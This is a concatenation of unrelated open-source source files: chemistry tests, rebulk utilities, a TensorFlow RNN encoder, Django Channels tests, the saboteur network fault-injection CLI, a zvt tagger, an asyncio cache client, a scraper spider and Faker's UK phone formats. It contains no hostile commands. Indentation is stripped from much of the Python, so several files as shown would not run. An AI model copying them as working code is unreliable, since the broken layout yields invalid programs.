self.conformer.bond_topologies[-1].bond_topology_id = 123
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 2)
# We don't actually care about the order, but this is what comes out right
# now.
self.assertEqual(got[0].bond_topology.bond_topology_id, 123)
self.assertEqual(got[0].count_attempted_conformers, 0)
self.assertEqual(got[0].count_kept_geometry, 0)
self.assertEqual(got[0].count_calculation_with_error, 0)
self.assertEqual(got[0].count_detected_match_with_error, 1)
self.assertEqual(got[1].bond_topology.bond_topology_id,
self.conformer.bond_topologies[0].bond_topology_id)
self.assertEqual(got[1].count_attempted_conformers, 1)
self.assertEqual(got[1].count_kept_geometry, 1)
self.assertEqual(got[1].count_calculation_with_error, 1)
self.assertEqual(got[1].count_detected_match_with_error, 0)
def test_calculation_success(self):
self.conformer.fate = dataset_pb2.Conformer.FATE_SUCCESS
self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])
self.conformer.bond_topologies[-1].bond_topology_id = 123
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 2)
# We don't actually care about the order, but this is what comes out right
# now.
self.assertEqual(got[0].bond_topology.bond_topology_id, 123)
self.assertEqual(got[0].count_attempted_conformers, 0)
self.assertEqual(got[0].count_kept_geometry, 0)
self.assertEqual(got[0].count_calculation_success, 0)
self.assertEqual(got[0].count_detected_match_success, 1)
self.assertEqual(got[1].bond_topology.bond_topology_id,
self.conformer.bond_topologies[0].bond_topology_id)
self.assertEqual(got[1].count_attempted_conformers, 1)
self.assertEqual(got[1].count_kept_geometry, 1)
self.assertEqual(got[1].count_calculation_success, 1)
self.assertEqual(got[1].count_detected_match_success, 0)
class LabeledSmilesTester(absltest.TestCase):
def test_atom_labels(self):
mol = Chem.MolFromSmiles('FCON[NH2+][O-]', sanitize=False)
self.assertIsNotNone(mol)
smiles_before = Chem.MolToSmiles(mol)
self.assertEqual(
smu_utils_lib.labeled_smiles(mol), 'F[CH2:1][O:2][NH:3][NH2+:4][O-:5]')
# Testing both the atom numbers and the smiles is redundant,
# but guards against possible future changes.
for atom in mol.GetAtoms():
self.assertEqual(atom.GetAtomMapNum(), 0)
self.assertEqual(Chem.MolToSmiles(mol), smiles_before)
if __name__ == '__main__':
absltest.main()
|
Contents/Libraries/Shared/rebulk/utils.py
|
jippo015/Sub-Zero.bundle
| 1,553 |
84993
|
<gh_stars>1000+
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various utilities functions
"""
try:  # Python 3.3+ moved the ABCs to collections.abc
    from collections.abc import MutableSet
except ImportError:  # Python 2 fallback
    from collections import MutableSet
from types import GeneratorType
def find_all(string, sub, start=None, end=None, ignore_case=False, **kwargs):
"""
Return all indices in string s where substring sub is
found, such that sub is contained in the slice s[start:end].
>>> list(find_all('The quick brown fox jumps over the lazy dog', 'fox'))
[16]
>>> list(find_all('The quick brown fox jumps over the lazy dog', 'mountain'))
[]
>>> list(find_all('The quick brown fox jumps over the lazy dog', 'The'))
[0]
>>> list(find_all(
... 'Carved symbols in a mountain hollow on the bank of an inlet irritated an eccentric person',
... 'an'))
[44, 51, 70]
>>> list(find_all(
... 'Carved symbols in a mountain hollow on the bank of an inlet irritated an eccentric person',
... 'an',
... 50,
... 60))
[51]
:param string: the input string
:type string: str
:param sub: the substring
:type sub: str
:return: all indices in the input string
    :rtype: __generator[int]
"""
#pylint: disable=unused-argument
if ignore_case:
sub = sub.lower()
string = string.lower()
while True:
start = string.find(sub, start, end)
if start == -1:
return
yield start
start += len(sub)
def get_first_defined(data, keys, default_value=None):
"""
Get the first defined key in data.
:param data:
:type data:
:param keys:
:type keys:
:param default_value:
:type default_value:
:return:
:rtype:
"""
for key in keys:
if key in data:
return data[key]
return default_value
def is_iterable(obj):
"""
Are we being asked to look up a list of things, instead of a single thing?
We check for the `__iter__` attribute so that this can cover types that
don't have to be known by this module, such as NumPy arrays.
Strings, however, should be considered as atomic values to look up, not
iterables.
We don't need to check for the Python 2 `unicode` type, because it doesn't
have an `__iter__` attribute anyway.
"""
# pylint: disable=consider-using-ternary
return hasattr(obj, '__iter__') and not isinstance(obj, str) or isinstance(obj, GeneratorType)
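# Hedged illustration (not part of the original module), showing the intent of
# is_iterable() on a few concrete values:
#   is_iterable([1, 2])           -> True
#   is_iterable(x for x in 'ab')  -> True  (generators are accepted explicitly)
#   is_iterable('abc')            -> False (strings are treated as atomic)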
def extend_safe(target, source):
"""
    Extends the target list with elements from the source list, skipping elements that already exist in the target list.
:param target:
:type target: list
:param source:
:type source: list
"""
for elt in source:
if elt not in target:
target.append(elt)
class _Ref(object):
"""
Reference for IdentitySet
"""
def __init__(self, value):
self.value = value
def __eq__(self, other):
return self.value is other.value
def __hash__(self):
return id(self.value)
class IdentitySet(MutableSet): # pragma: no cover
"""
Set based on identity
"""
def __init__(self, items=None): # pylint: disable=super-init-not-called
if items is None:
items = []
self.refs = set(map(_Ref, items))
def __contains__(self, elem):
return _Ref(elem) in self.refs
def __iter__(self):
return (ref.value for ref in self.refs)
def __len__(self):
return len(self.refs)
def add(self, value):
self.refs.add(_Ref(value))
def discard(self, value):
self.refs.discard(_Ref(value))
def update(self, iterable):
"""
Update set with iterable
:param iterable:
:type iterable:
:return:
:rtype:
"""
for elem in iterable:
self.add(elem)
def __repr__(self): # pragma: no cover
return "%s(%s)" % (type(self).__name__, list(self))
|
modules/rnn.py
|
bckim92/sequential-knowledge-transformer
| 135 |
84998
|
<gh_stars>100-1000
import tensorflow as tf
def single_rnn_cell(units: int,
cell_type: str = "gru",
name: str = None):
if cell_type == "gru":
# Masking is not supported for CuDNN RNNs
return tf.keras.layers.GRU(
units,
return_sequences=True,
return_state=True,
name=name)
elif cell_type == "cudnn_gru":
return tf.compat.v1.keras.layers.CuDNNGRU(
units,
return_sequences=True,
return_state=True,
name=name)
elif cell_type == "gru_cell":
#return tf.keras.layers.GRUCell(
# units,
# name=name
#)
# Use this for decoder
return tf.nn.rnn_cell.GRUCell(
units,
name=name
)
else:
raise ValueError
class RnnEncoder(tf.keras.layers.Layer):
def __init__(self,
units: int,
cell_type: str = "gru",
name: str = None):
super().__init__(name=name)
self._units = units
self._cell_type = cell_type
self._name = name
def build(self, input_shape):
rnn_cell = single_rnn_cell(self._units, self._cell_type)
self.birnn_cell = tf.keras.layers.Bidirectional(rnn_cell)
super().build(input_shape)
def call(self, x, initial_state=None):
outputs, fw_state, bw_state = self.birnn_cell(x, initial_state=initial_state)
return outputs, fw_state, bw_state
def compute_output_shape(self, input_shape):
shape = tf.TensorShape(input_shape).as_list()
batch_size = shape[0]
shape[-1] = self._units * 2
return [tf.TensorShape(shape),
tf.TensorShape([batch_size, self._units]),
tf.TensorShape([batch_size, self._units])]
def get_config(self):
return {
"units": self._units,
"cell_type": self._cell_type
}
def compute_mask(self, inputs, mask):
return self.birnn_cell.compute_mask(inputs, mask)
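# Hedged usage sketch (not part of the original module; the sizes below are
# arbitrary examples): the bidirectional GRU doubles the feature dimension of
# `outputs`, while each direction returns a state of size `units`, matching
# compute_output_shape() above.
if __name__ == "__main__":
    encoder = RnnEncoder(units=16, cell_type="gru")
    x = tf.random.normal([4, 10, 8])  # (batch, time, features)
    outputs, fw_state, bw_state = encoder(x)
    print(outputs.shape, fw_state.shape, bw_state.shape)  # (4, 10, 32) (4, 16) (4, 16)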
|
tests/test_layers.py
|
MattBroach/channels
| 4,277 |
85023
|
import unittest
import pytest
from django.test import override_settings
from channels import DEFAULT_CHANNEL_LAYER
from channels.exceptions import InvalidChannelLayerError
from channels.layers import InMemoryChannelLayer, channel_layers, get_channel_layer
class TestChannelLayerManager(unittest.TestCase):
@override_settings(
CHANNEL_LAYERS={"default": {"BACKEND": "channels.layers.InMemoryChannelLayer"}}
)
def test_config_error(self):
"""
        If the channel layer doesn't specify TEST_CONFIG, `make_test_backend`
        should raise an error.
"""
with self.assertRaises(InvalidChannelLayerError):
channel_layers.make_test_backend(DEFAULT_CHANNEL_LAYER)
@override_settings(
CHANNEL_LAYERS={
"default": {
"BACKEND": "channels.layers.InMemoryChannelLayer",
"TEST_CONFIG": {"expiry": 100500},
}
}
)
def test_config_instance(self):
"""
        If the channel layer provides TEST_CONFIG, `make_test_backend` should
        return a channel layer instance appropriate for testing.
"""
layer = channel_layers.make_test_backend(DEFAULT_CHANNEL_LAYER)
self.assertEqual(layer.expiry, 100500)
def test_override_settings(self):
"""
The channel layers cache is reset when the CHANNEL_LAYERS setting
changes.
"""
with override_settings(
CHANNEL_LAYERS={
"default": {"BACKEND": "channels.layers.InMemoryChannelLayer"}
}
):
self.assertEqual(channel_layers.backends, {})
get_channel_layer()
self.assertNotEqual(channel_layers.backends, {})
self.assertEqual(channel_layers.backends, {})
# In-memory layer tests
@pytest.mark.asyncio
async def test_send_receive():
layer = InMemoryChannelLayer()
message = {"type": "test.message"}
await layer.send("test.channel", message)
assert message == await layer.receive("test.channel")
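@pytest.mark.asyncio
async def test_group_send_receive():
    """
    Hedged sketch (not in the original file): assumes InMemoryChannelLayer
    implements the standard group_add/group_send coroutines of the channel
    layer API.
    """
    layer = InMemoryChannelLayer()
    await layer.group_add("test-group", "test.channel")
    message = {"type": "test.message"}
    await layer.group_send("test-group", message)
    assert message == await layer.receive("test.channel")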
|
thirdparty/patchmatchnet/datasets/__init__.py
|
swershrimpy/gtsfm
| 122 |
85035
|
<filename>thirdparty/patchmatchnet/datasets/__init__.py
"""PatchmatchNet dataset module
reference: https://github.com/FangjinhuaWang/PatchmatchNet
"""
|
saboteur/cli.py
|
tomakehurst/saboteur
| 258 |
85042
|
<reponame>tomakehurst/saboteur
#!/usr/bin/env python
import sys
import httplib
import json
from optparse import OptionParser
import os
from os.path import expanduser
from apicommands import FAULT_TYPES
RESPONSES={ 200: 'OK', 400: 'Bad request', 500: 'Server error' }
def add_fault(hosts, options):
print('Adding fault: ' + json.dumps(options))
for host in hosts:
print('Adding fault to ' + host),
conn=httplib.HTTPConnection(host, 6660)
conn.request('POST', '/', json.dumps(options), { 'Content-Type': 'application/json' })
response=conn.getresponse()
data=response.read()
conn.close()
print(': ' + RESPONSES[response.status])
if response.status != 200:
print(data)
def reset_hosts(hosts, options):
for host in hosts:
print('Resetting host ' + host),
conn=httplib.HTTPConnection(host, 6660)
conn.request('DELETE', '/')
response=conn.getresponse()
data=response.read()
conn.close()
print(': ' + RESPONSES[response.status])
if response.status != 200:
print(data)
ACTIONS={'add': add_fault,
'reset': reset_hosts
}
option_parser=OptionParser(usage="Usage: %prog <action> [options]\n\n\
Valid actions: add, reset")
option_parser.add_option('-n', '--name', dest='name', help='A name for the rule', default='(no-name)')
option_parser.add_option('-f', '--from', dest='from', help='Limit rule to packets coming from this host')
option_parser.add_option('-t', '--to', dest='to', help='Limit rule to packets to this host')
option_parser.add_option('-p', '--to_port', dest='to_port', type='int')
option_parser.add_option('-d', '--direction', dest='direction')
option_parser.add_option('-F', '--fault_type', dest='type', help="Valid types: " + ", ".join(FAULT_TYPES.keys()))
option_parser.add_option('-l', '--delay', dest='delay', type='int', help='Delay in milliseconds. Only valid with fault type DELAY.')
option_parser.add_option('-v', '--variance', dest='variance', type='int', help='Delay variance in milliseconds. Only valid with fault type DELAY.')
option_parser.add_option('-c', '--correlation', dest='correlation', type='int', help='Percent delay or packet loss correlation. Only valid with fault type DELAY or PACKET_LOSS.')
option_parser.add_option('-D', '--distribution', dest='distribution', help='Delay distribution type. Valid types: uniform, normal, pareto, paretonormal. Only valid with fault type DELAY.')
option_parser.add_option('-r', '--protocol', dest='protocol', help='Default is TCP')
option_parser.add_option('-P', '--probability', dest='probability', type='int', help='Packet loss probability. Only valid with fault type PACKET_LOSS.')
option_parser.add_option('-T', '--timeout', dest='timeout', type='int', help='TCP connection timeout. Only valid when used with fault type FIREWALL_TIMEOUT.')
option_parser.add_option('-H', '--hosts', dest='hosts', help='Hosts for this client/service', default='127.0.0.1')
(options, args)=option_parser.parse_args()
if len(sys.argv) < 2:
option_parser.print_help()
sys.exit(2)
if len(args) < 1:
print("Error: action required. Valid options: " + str(ACTIONS.keys()))
sys.exit(2)
action=args[0]
print("action: "+ action)
if action not in ACTIONS.keys():
print('Valid actions: ' + ", ".join(ACTIONS.keys()))
sys.exit(2)
hosts = options.hosts.split(',')
fault_params = dict(filter(lambda (k,v): k != 'hosts' and v is not None, options.__dict__.items()))
#print("Action: " + action + ". Options: " + str(options))
action_fn=ACTIONS[action]
action_fn(hosts, fault_params)
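# Hedged usage sketch (not part of the original script; the `saboteur` wrapper
# name is hypothetical): a saboteur agent is assumed to be listening on port
# 6660 of each target host, and all option values below are examples only.
#
#   saboteur add -n slow-db -F DELAY -l 500 -v 100 -t db.example.com -p 5432 \
#       -H 10.0.0.1,10.0.0.2
#   saboteur reset -H 10.0.0.1,10.0.0.2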
|
examples/basic_usage/generic_driver.py
|
verbosemode/scrapli
| 404 |
85071
|
"""examples.basic_usage.generic_driver"""
from scrapli.driver import GenericDriver
MY_DEVICE = {
"host": "172.18.0.11",
"auth_username": "scrapli",
"auth_password": "<PASSWORD>",
"auth_strict_key": False,
}
def main():
"""Simple example of connecting to an IOSXEDevice with the GenericDriver"""
    # the `GenericDriver` is a good place to start if your platform is not supported by a "core"
    # platform driver
conn = GenericDriver(**MY_DEVICE)
conn.open()
print(conn.channel.get_prompt())
print(conn.send_command("show run | i hostname").result)
# IMPORTANT: paging is NOT disabled w/ GenericDriver driver!
conn.send_command("terminal length 0")
print(conn.send_command("show run").result)
conn.close()
# Context manager is a great way to use scrapli, it will auto open/close the connection for you:
with GenericDriver(**MY_DEVICE) as conn:
result = conn.send_command("show run | i hostname")
print(result.result)
if __name__ == "__main__":
main()
|
src/zvt/tag/tag.py
|
vishalbelsare/zvt
| 2,032 |
85099
|
<filename>src/zvt/tag/tag.py
# -*- coding: utf-8 -*-
import logging
from typing import Type
import pandas as pd
from zvt.contract import Mixin
from zvt.contract import TradableEntity
from zvt.contract.api import get_db_session
from zvt.contract.base import OneStateService
from zvt.contract.zvt_info import TaggerState
from zvt.domain import Stock, Index
from zvt.tag.dataset.stock_tags import StockTags
from zvt.utils import to_time_str, to_pd_timestamp
from zvt.utils.time_utils import TIME_FORMAT_DAY, now_pd_timestamp
logger = logging.getLogger(__name__)
class Tagger(OneStateService):
state_schema = TaggerState
entity_schema: Type[TradableEntity] = None
data_schema: Type[Mixin] = None
start_timestamp = "2005-01-01"
def __init__(self, force=False) -> None:
super().__init__()
assert self.entity_schema is not None
assert self.data_schema is not None
self.force = force
self.session = get_db_session(provider="zvt", data_schema=self.data_schema)
if self.state and not self.force:
logger.info(f"get start_timestamp from state")
self.start_timestamp = self.state["current_timestamp"]
logger.info(f"tag start_timestamp: {self.start_timestamp}")
def tag(self, timestamp):
raise NotImplementedError
def get_tag_timestamps(self):
return pd.date_range(start=self.start_timestamp, end=now_pd_timestamp(), freq="M")
def get_tag_domain(self, entity_id, timestamp, **fill_kv):
the_date = to_time_str(timestamp, fmt=TIME_FORMAT_DAY)
the_id = f"{entity_id}_{the_date}"
the_domain = self.data_schema.get_one(id=the_id)
if the_domain:
for k, v in fill_kv.items():
exec(f"the_domain.{k}=v")
else:
return self.data_schema(id=the_id, entity_id=entity_id, timestamp=to_pd_timestamp(the_date), **fill_kv)
return the_domain
def get_tag_domains(self, entity_ids, timestamp, **fill_kv):
the_date = to_time_str(timestamp, fmt=TIME_FORMAT_DAY)
ids = [f"{entity_id}_{the_date}" for entity_id in entity_ids]
the_domains = self.data_schema.query_data(ids=ids, return_type="domain")
if the_domains:
for the_domain in the_domains:
for k, v in fill_kv.items():
exec(f"the_domain.{k}=v")
current_ids = [item.id for item in the_domains]
need_new_ids = set(ids) - set(current_ids)
new_domains = [
self.data_schema(
id=f"{entity_id}_{the_date}", entity_id=entity_id, timestamp=to_pd_timestamp(the_date), **fill_kv
)
for entity_id in need_new_ids
]
return the_domains + new_domains
def run(self):
timestamps = self.get_tag_timestamps()
for timestamp in timestamps:
logger.info(f"tag to {timestamp}")
self.tag(timestamp=timestamp)
self.state = {"current_timestamp": to_time_str(timestamp)}
self.persist_state()
class StockTagger(Tagger):
data_schema = StockTags
entity_schema = Stock
def tag(self, timestamp):
raise NotImplementedError
class IndexTagger(Tagger):
data_schema = StockTags
entity_schema = Index
def tag(self, timestamp):
raise NotImplementedError
# the __all__ is generated
__all__ = ["Tagger", "StockTagger", "IndexTagger"]
|
thirdparty/asyncio/examples/cacheclt.py
|
xan4/sa-nv
| 402 |
85112
|
<gh_stars>100-1000
"""Client for cache server.
See cachesvr.py for protocol description.
"""
import argparse
import asyncio
from asyncio import test_utils
import json
import logging
ARGS = argparse.ArgumentParser(description='Cache client example.')
ARGS.add_argument(
'--tls', action='store_true', dest='tls',
default=False, help='Use TLS')
ARGS.add_argument(
'--iocp', action='store_true', dest='iocp',
default=False, help='Use IOCP event loop (Windows only)')
ARGS.add_argument(
'--host', action='store', dest='host',
default='localhost', help='Host name')
ARGS.add_argument(
'--port', action='store', dest='port',
default=54321, type=int, help='Port number')
ARGS.add_argument(
'--timeout', action='store', dest='timeout',
default=5, type=float, help='Timeout')
ARGS.add_argument(
'--max_backoff', action='store', dest='max_backoff',
default=5, type=float, help='Max backoff on reconnect')
ARGS.add_argument(
'--ntasks', action='store', dest='ntasks',
default=10, type=int, help='Number of tester tasks')
ARGS.add_argument(
'--ntries', action='store', dest='ntries',
default=5, type=int, help='Number of request tries before giving up')
args = ARGS.parse_args()
class CacheClient:
"""Multiplexing cache client.
    This wraps a single connection to the cache server.  The
connection is automatically re-opened when an error occurs.
Multiple tasks may share this object; the requests will be
serialized.
The public API is get(), set(), delete() (all are coroutines).
"""
def __init__(self, host, port, sslctx=None, loop=None):
self.host = host
self.port = port
self.sslctx = sslctx
self.loop = loop
self.todo = set()
self.initialized = False
self.task = asyncio.Task(self.activity(), loop=self.loop)
@asyncio.coroutine
def get(self, key):
resp = yield from self.request('get', key)
if resp is None:
return None
return resp.get('value')
@asyncio.coroutine
def set(self, key, value):
resp = yield from self.request('set', key, value)
if resp is None:
return False
return resp.get('status') == 'ok'
@asyncio.coroutine
def delete(self, key):
resp = yield from self.request('delete', key)
if resp is None:
return False
return resp.get('status') == 'ok'
@asyncio.coroutine
def request(self, type, key, value=None):
assert not self.task.done()
data = {'type': type, 'key': key}
if value is not None:
data['value'] = value
payload = json.dumps(data).encode('utf8')
waiter = asyncio.Future(loop=self.loop)
if self.initialized:
try:
yield from self.send(payload, waiter)
except IOError:
self.todo.add((payload, waiter))
else:
self.todo.add((payload, waiter))
return (yield from waiter)
@asyncio.coroutine
def activity(self):
backoff = 0
while True:
try:
self.reader, self.writer = yield from asyncio.open_connection(
self.host, self.port, ssl=self.sslctx, loop=self.loop)
except Exception as exc:
backoff = min(args.max_backoff, backoff + (backoff//2) + 1)
logging.info('Error connecting: %r; sleep %s', exc, backoff)
yield from asyncio.sleep(backoff, loop=self.loop)
continue
backoff = 0
self.next_id = 0
self.pending = {}
            self.initialized = True
try:
while self.todo:
payload, waiter = self.todo.pop()
if not waiter.done():
yield from self.send(payload, waiter)
while True:
resp_id, resp = yield from self.process()
if resp_id in self.pending:
payload, waiter = self.pending.pop(resp_id)
if not waiter.done():
waiter.set_result(resp)
except Exception as exc:
self.initialized = False
self.writer.close()
while self.pending:
req_id, pair = self.pending.popitem()
payload, waiter = pair
if not waiter.done():
self.todo.add(pair)
logging.info('Error processing: %r', exc)
@asyncio.coroutine
def send(self, payload, waiter):
self.next_id += 1
req_id = self.next_id
frame = 'request %d %d\n' % (req_id, len(payload))
self.writer.write(frame.encode('ascii'))
self.writer.write(payload)
self.pending[req_id] = payload, waiter
yield from self.writer.drain()
@asyncio.coroutine
def process(self):
frame = yield from self.reader.readline()
if not frame:
raise EOFError()
head, tail = frame.split(None, 1)
if head == b'error':
raise IOError('OOB error: %r' % tail)
if head != b'response':
raise IOError('Bad frame: %r' % frame)
resp_id, resp_size = map(int, tail.split())
data = yield from self.reader.readexactly(resp_size)
if len(data) != resp_size:
raise EOFError()
resp = json.loads(data.decode('utf8'))
return resp_id, resp
def main():
asyncio.set_event_loop(None)
if args.iocp:
from asyncio.windows_events import ProactorEventLoop
loop = ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
sslctx = None
if args.tls:
sslctx = test_utils.dummy_ssl_context()
cache = CacheClient(args.host, args.port, sslctx=sslctx, loop=loop)
try:
loop.run_until_complete(
asyncio.gather(
*[testing(i, cache, loop) for i in range(args.ntasks)],
loop=loop))
finally:
loop.close()
@asyncio.coroutine
def testing(label, cache, loop):
def w(g):
return asyncio.wait_for(g, args.timeout, loop=loop)
key = 'foo-%s' % label
while True:
logging.info('%s %s', label, '-'*20)
try:
ret = yield from w(cache.set(key, 'hello-%s-world' % label))
logging.info('%s set %s', label, ret)
ret = yield from w(cache.get(key))
logging.info('%s get %s', label, ret)
ret = yield from w(cache.delete(key))
logging.info('%s del %s', label, ret)
ret = yield from w(cache.get(key))
logging.info('%s get2 %s', label, ret)
except asyncio.TimeoutError:
logging.warn('%s Timeout', label)
except Exception as exc:
logging.exception('%s Client exception: %r', label, exc)
break
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()
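# Hedged usage sketch (not part of the original example): from a coroutine
# running on the same event loop, the public API is used roughly as follows.
#
#   cache = CacheClient('localhost', 54321, loop=loop)
#   ok = yield from cache.set('answer', 42)        # True on success
#   value = yield from cache.get('answer')         # 42, or None on failure
#   deleted = yield from cache.delete('answer')    # True on success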
|
locations/spiders/hopdoddy_burger_bar.py
|
boomerwv1/alltheplaces
| 297 |
85118
|
<reponame>boomerwv1/alltheplaces
# -*- coding: utf-8 -*-
import json
import re
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
class HopdoddyBurgerBarSpider(scrapy.Spider):
name = "hopdoddy_burger_bar"
allowed_domains = ["amazonaws.com"]
def start_requests(self):
base_url = "https://na6c0i4fb0.execute-api.us-west-2.amazonaws.com/restaurants/near?lat={lat}3&long={lon}"
with open('./locations/searchable_points/us_centroids_25mile_radius.csv') as points:
next(points) # Ignore the header
for point in points:
_, lat, lon = point.strip().split(',')
url = base_url.format(lat=lat, lon=lon)
yield scrapy.http.Request(url, callback=self.parse)
def parse(self, response):
data = json.loads(response.body_as_unicode())
for place in data["restaurants"]:
properties = {
'ref': place["id"],
'name': place["name"],
'addr_full': place["streetaddress"],
'city': place["city"],
'state': place["state"],
'postcode': place["zip"],
'country': place["country"],
'lat': place["latitude"],
'lon': place["longitude"],
'phone': place["telephone"]
}
yield GeojsonPointItem(**properties)
|
faker/providers/phone_number/en_GB/__init__.py
|
mgorny/faker
| 12,077 |
85158
|
from .. import Provider as PhoneNumberProvider
class Provider(PhoneNumberProvider):
# Source:
# https://en.wikipedia.org/wiki/Telephone_numbers_in_the_United_Kingdom
# Fake phone numbers should be fake - this provider has been rewritten to
# use numbers reserved for dramatic use by Ofcom. See the following:
# https://en.wikipedia.org/wiki/Fictitious_telephone_number#United_Kingdom
# This ensures no genuine numbers are generated at random.
#
# It's worth noting that the following examples include incorrect notation
# of British phone numbers. +44(0)xxx is incorrect and the '(0)' should
# be omitted. However, it's commonly written this way by Joe Public
# and would better serve this project to be included, as it represents
# more realistic data and is of benefit to those developing data cleansing
# tools etc. All possible official fake numbers are covered below.
cellphone_formats = (
'07700 900 ###',
'07700 900###',
'07700900###',
'(07700) 900 ###',
'(07700) 900###',
'(07700)900###',
'+447700 900 ###',
'+447700 900###',
'+447700900###',
'+44(0)7700 900 ###',
'+44(0)7700 900###',
'+44(0)7700900###',
)
formats = (
'0113 496 0###',
'0113 4960###',
'01134960###',
'(0113) 496 0###',
'(0113) 4960###',
'(0113)4960###',
'+44113 496 0###',
'+44113 4960###',
'+441134960###',
'+44(0)113 496 0###',
'+44(0)113 4960###',
'+44(0)1134960###',
'0114 496 0###',
'0114 4960###',
'01144960###',
'(0114) 496 0###',
'(0114) 4960###',
'(0114)4960###',
'+44114 496 0###',
'+44114 4960###',
'+441144960###',
'+44(0)114 496 0###',
'+44(0)114 4960###',
'+44(0)1144960###',
'0115 496 0###',
'0115 4960###',
'01154960###',
'(0115) 496 0###',
'(0115) 4960###',
'(0115)4960###',
'+44115 496 0###',
'+44115 4960###',
'+441154960###',
'+44(0)115 496 0###',
'+44(0)115 4960###',
'+44(0)1154960###',
'0116 496 0###',
'0116 4960###',
'01164960###',
'(0116) 496 0###',
'(0116) 4960###',
'(0116)4960###',
'+44116 496 0###',
'+44116 4960###',
'+441164960###',
'+44(0)116 496 0###',
'+44(0)116 4960###',
'+44(0)1164960###',
'0117 496 0###',
'0117 4960###',
'01174960###',
'(0117) 496 0###',
'(0117) 4960###',
'(0117)4960###',
'+44117 496 0###',
'+44117 4960###',
'+441174960###',
'+44(0)117 496 0###',
'+44(0)117 4960###',
'+44(0)1174960###',
'0118 496 0###',
'0118 4960###',
'01184960###',
'(0118) 496 0###',
'(0118) 4960###',
'(0118)4960###',
'+44118 496 0###',
'+44118 4960###',
'+441184960###',
'+44(0)118 496 0###',
'+44(0)118 4960###',
'+44(0)1184960###',
'0121 496 0###',
'0121 4960###',
'01214960###',
'(0121) 496 0###',
'(0121) 4960###',
'(0121)4960###',
'+44121 496 0###',
'+44121 4960###',
'+441214960###',
'+44(0)121 496 0###',
'+44(0)121 4960###',
'+44(0)1214960###',
'0131 496 0###',
'0131 4960###',
'01314960###',
'(0131) 496 0###',
'(0131) 4960###',
'(0131)4960###',
'+44131 496 0###',
'+44131 4960###',
'+441314960###',
'+44(0)131 496 0###',
'+44(0)131 4960###',
'+44(0)1314960###',
'0141 496 0###',
'0141 4960###',
'01414960###',
'(0141) 496 0###',
'(0141) 4960###',
'(0141)4960###',
'+44141 496 0###',
'+44141 4960###',
'+441414960###',
'+44(0)141 496 0###',
'+44(0)141 4960###',
'+44(0)1414960###',
'0151 496 0###',
'0151 4960###',
'01514960###',
'(0151) 496 0###',
'(0151) 4960###',
'(0151)4960###',
'+44151 496 0###',
'+44151 4960###',
'+441514960###',
'+44(0)151 496 0###',
'+44(0)151 4960###',
'+44(0)1514960###',
'0161 496 0###',
'0161 4960###',
'01614960###',
'(0161) 496 0###',
'(0161) 4960###',
'(0161)4960###',
'+44161 496 0###',
'+44161 4960###',
'+441614960###',
'+44(0)161 496 0###',
'+44(0)161 4960###',
'+44(0)1614960###',
'0191 498 0###',
'0191 4960###',
'01914960###',
'(0191) 496 0###',
'(0191) 4960###',
'(0191)4960###',
'+44191 496 0###',
'+44191 4960###',
'+441914960###',
'+44(0)191 496 0###',
'+44(0)191 4960###',
'+44(0)1914960###',
'020 7946 0###',
'020 74960###',
'02074960###',
'(020) 7496 0###',
'(020) 74960###',
'(020)74960###',
'+4420 7496 0###',
'+4420 74960###',
'+442074960###',
'+44(0)20 7496 0###',
'+44(0)20 74960###',
'+44(0)2074960###',
'028 9018 0###',
'028 9018###',
'0289018###',
'(028) 9018 0###',
'(028) 9018###',
'(028)9018###',
'+4428 9018 0###',
'+4428 9018###',
'+44289018###',
'+44(0)28 9018 0###',
'+44(0)28 9018###',
'+44(0)289018###',
'029 2018 0###',
'029 2018###',
'0292018###',
'(029) 2018 0###',
'(029) 2018###',
'(029)2018###',
'+4429 2018 0###',
'+4429 2018###',
'+44292018###',
'+44(0)29 2018 0###',
'+44(0)29 2018###',
'+44(0)292018###',
'01632 960 ###',
'01632 960###',
'01632960###',
'(01632) 960 ###',
'(01632) 960###',
'(01632)960###',
'+441632 960 ###',
'+441632 960###',
'+441632960###',
'+44(0)1632 960 ###',
'+44(0)1632 960###',
'+44(0)1632960###',
'0306 999 0###',
'0306 9990###',
'03069990###',
'(0306) 999 0###',
'(0306) 9990###',
'(0306)9990###',
'+44306 999 0###',
'+44306 9990###',
'+443069990###',
'+44(0)306 999 0###',
'+44(0)306 9990###',
'+44(0)3069990###',
'0808 157 0###',
'0808 1570###',
'08081570###',
'(0808) 157 0###',
'(0808) 1570###',
'(0808)1570###',
'+44808 157 0###',
'+44808 1570###',
'+448081570###',
'+44(0)808 157 0###',
'+44(0)808 1570###',
'+44(0)8081570###',
'0909 879 0###',
'0909 8790###',
'09098790###',
'(0909) 879 0###',
'(0909) 8790###',
'(0909)8790###',
'+44909 879 0###',
'+44909 8790###',
'+449098790###',
'+44(0)909 879 0###',
'+44(0)909 8790###',
'+44(0)9098790###',
)
def cellphone_number(self) -> str:
pattern: str = self.random_element(self.cellphone_formats)
return self.numerify(self.generator.parse(pattern))
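# Hedged usage sketch (not part of the provider itself): with the standard
# Faker entry point the en_GB locale picks this provider up automatically.
#
#   from faker import Faker
#   fake = Faker('en_GB')
#   fake.phone_number()      # e.g. '(0113) 496 0742', drawn from the reserved ranges above
#   fake.cellphone_number()  # e.g. '07700 900 123'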
|
halogen/halogen.py
|
wroersma/halogen
| 174 |
85160
|
<reponame>wroersma/halogen<filename>halogen/halogen.py<gh_stars>100-1000
# coding=utf-8
""" The mfbot Python3 CLI script """
from mfbot import MFBot
def main() -> None:
""" Main function to start things up for the command line use of mfbot """
mfbot = MFBot()
mfbot.parse_args()
if mfbot.dir:
yara_rule_output = mfbot.dir_run()
if len(yara_rule_output) > 0:
mfbot.print_yara_rule(yara_rule_output)
else:
print("No images found within that directory")
else:
yara_rule_output = mfbot.run()
if len(yara_rule_output) > 0:
mfbot.print_yara_rule(yara_rule_output)
else:
print('No image found.')
if __name__ == "__main__":
main()
|
airlab/utils/imageFilters.py
|
jlevy44/airlab
| 330 |
85162
|
# Copyright 2018 University of Basel, Center for medical Image Analysis and Navigation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
